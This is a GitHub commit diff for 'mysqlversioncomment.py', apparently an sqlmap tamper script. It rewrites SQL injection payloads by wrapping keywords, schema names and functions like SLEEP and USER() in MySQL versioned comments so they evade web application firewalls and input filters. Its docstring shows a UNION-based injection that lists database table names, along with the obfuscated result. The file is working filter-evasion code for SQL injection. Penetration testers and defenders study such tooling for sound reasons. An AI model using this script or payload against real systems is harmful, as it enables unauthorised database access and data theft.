Skip to content

Commit f596ede

Browse files
pinoyvendettapinoyvendetta
committed
Update mysqlversioncomment.py
1 parent d09fe4e commit f596ede

File tree

1 file changed

+16
-9
lines changed

1 file changed

+16
-9
lines changed

tamper/mysqlversioncomment.py

Lines changed: 16 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,9 @@
1212
__priority__ = PRIORITY.NORMAL
1313

1414
def dependencies():
15+
"""
16+
This tamper script does not have any dependencies.
17+
"""
1518
pass
1619

1720
def tamper(payload, **kwargs):
@@ -33,7 +36,9 @@ def tamper(payload, **kwargs):
3336
>>> tamper("1 AND 1=1 UNION ALL SELECT 1,GROUP_CONCAT(table_name),3 FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()")
3437
'1 AND 1=1 /*!50000UNION*/ /*!50000ALL*/ /*!50000SELECT*/ 1,/*!50000GROUP_CONCAT*/(/*!50000table_name*/),3 /*!50000FROM*/ /*!50000INFORMATION_SCHEMA.TABLES*/ /*!50000WHERE*/ /*!50000table_schema*/=/*!50000database()*/'
3538
"""
39+
3640
keywords = {
41+
# DML & DDL
3742
"SELECT": "/*!50000SELECT*/",
3843
"UNION": "/*!50000UNION*/",
3944
"INSERT": "/*!50000INSERT*/",
@@ -46,11 +51,15 @@ def tamper(payload, **kwargs):
4651
"LIMIT": "/*!50000LIMIT*/",
4752
"ALL": "/*!50000ALL*/",
4853
"DISTINCT": "/*!50000DISTINCT*/",
54+
55+
# Information Schema
4956
"INFORMATION_SCHEMA.TABLES": "/*!50000INFORMATION_SCHEMA.TABLES*/",
5057
"INFORMATION_SCHEMA.COLUMNS": "/*!50000INFORMATION_SCHEMA.COLUMNS*/",
5158
"TABLE_NAME": "/*!50000TABLE_NAME*/",
5259
"COLUMN_NAME": "/*!50000COLUMN_NAME*/",
5360
"TABLE_SCHEMA": "/*!50000TABLE_SCHEMA*/",
61+
62+
# Functions
5463
"CONCAT": "/*!50000CONCAT*/",
5564
"CONCAT_WS": "/*!50000CONCAT_WS*/",
5665
"GROUP_CONCAT": "/*!50000GROUP_CONCAT*/",
@@ -62,13 +71,17 @@ def tamper(payload, **kwargs):
6271
"ORD": "/*!50000ORD*/",
6372
"BENCHMARK": "/*!50000BENCHMARK*/",
6473
"SLEEP": "/*!50000SLEEP*/",
74+
75+
# System Information Functions
6576
"DATABASE()": "/*!50000DATABASE()*/",
6677
"USER()": "/*!50000USER()*/",
6778
"SESSION_USER()": "/*!50000SESSION_USER()*/",
6879
"SYSTEM_USER()": "/*!50000SYSTEM_USER()*/",
6980
"VERSION()": "/*!50000VERSION()*/",
7081
"@@VERSION": "/*!50000@@VERSION*/",
7182
"@@HOSTNAME": "/*!50000@@HOSTNAME*/",
83+
84+
# Other keywords
7285
"SEPARATOR": "/*!50000SEPARATOR*/",
7386
"HAVING": "/*!50000HAVING*/",
7487
"INTO": "/*!50000INTO*/",
@@ -80,13 +93,7 @@ def tamper(payload, **kwargs):
8093
ret_val = payload
8194

8295
if payload:
83-
sorted_keywords = sorted(keywords.keys(), key=len, reverse=True)
84-
85-
for keyword in sorted_keywords:
86-
if "()" in keyword:
87-
regex_keyword = re.escape(keyword)
88-
ret_val = re.sub(r"(?i)\b%s\b" % regex_keyword, keywords[keyword], ret_val)
89-
else:
90-
ret_val = re.sub(r"(?i)\b%s\b" % re.escape(keyword), keywords[keyword], ret_val)
96+
for keyword in keywords:
97+
ret_val = re.sub(r"(?i)(?<!\w)%s(?!\w)" % re.escape(keyword), keywords[keyword], ret_val)
9198

92-
return ret_val
99+
return ret_val

0 commit comments

Comments
 (0)